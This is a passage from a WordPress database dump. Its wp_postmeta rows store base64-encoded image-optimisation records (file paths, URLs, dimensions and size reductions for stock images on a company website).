MDIsInRpbWUiOjE0ODM1ODIyMjQsImlkIjo3NjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NjAsInRpbWUiOjE0ODM1ODIyMjgsImlkIjo3NjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NTksInRpbWUiOjE0ODM1ODIyMzEsImlkIjo3NjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NTAsInRpbWUiOjE0ODM1ODIyMzQsImlkIjo3NjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMTQzLCJ0aW1lIjoxNDgzNTgyMjM4LCJpZCI6NzY0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MjUsInRpbWUiOjE0ODM1ODIyNDEsImlkIjo3NjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ4MSwidGltZSI6MTQ4MzU4MjI0NSwiaWQiOjc2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjM1LCJ0aW1lIjoxNDgzNTgyMjQ4LCJpZCI6NzY0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2OTAsInRpbWUiOjE0ODM1ODIyNTIsImlkIjo3NjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjg4NiwidGltZSI6MTQ4MzU4MjI1NiwiaWQiOjc2NH1d'); 
INSERT INTO `wp_postmeta` VALUES (30003, 763, 'wpfc_optimisation_reduction', '2261467'); 
INSERT INTO `wp_postmeta` VALUES (30004, 763, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUuanBnIiwid2lkdGgiOjM2MDAsImhlaWdodCI6MjQwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUuanBnIiwicmVkdWN0aW9uIjoyMjYxNDU0LCJ0aW1lIjoxNDgzNTgyMjY3LCJpZCI6Ijc2MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMjcwLCJpZCI6NzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MjI3MywiaWQiOjc2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODIyNzYsImlkIjo3NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODIyODAsImlkIjo3NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMjgyLCJpZCI6NzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MjI4NCwiaWQiOjc2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODIyODcsImlkIjo3NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMjkwLCJpZCI6NzYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMjkyLCJpZCI6NzYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMjk1LCJpZCI6NzYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMjk3LCJpZCI6NzYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMzAwLCJpZCI6NzYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzNDAwNDUxNS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzQwMDQ1MTUtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM0MDA0NTE1LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMzAyLCJpZCI6NzYzfV0='); 
INSERT INTO `wp_postmeta` VALUES (30005, 762, 'wpfc_optimisation_reduction', '12885'); 
INSERT INTO `wp_postmeta` VALUES (30006, 762, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU0NDcyMDc1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzU0NDcyMDc1LmpwZyIsIndpZHRoIjozNjIwLCJoZWlnaHQiOjI3MTUsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODIzMDcsImlkIjoiNzYyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTQ0NzIwNzUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTQ0NzIwNzUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTQ0NzIwNzUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU5MiwidGltZSI6MTQ4MzU4MjMxMSwiaWQiOjc2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTQ0NzIwNzUtODAweDYwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTQ0NzIwNzUtODAweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNTQ0NzIwNzUtODAweDYwMC5qcGciLCJyZWR1Y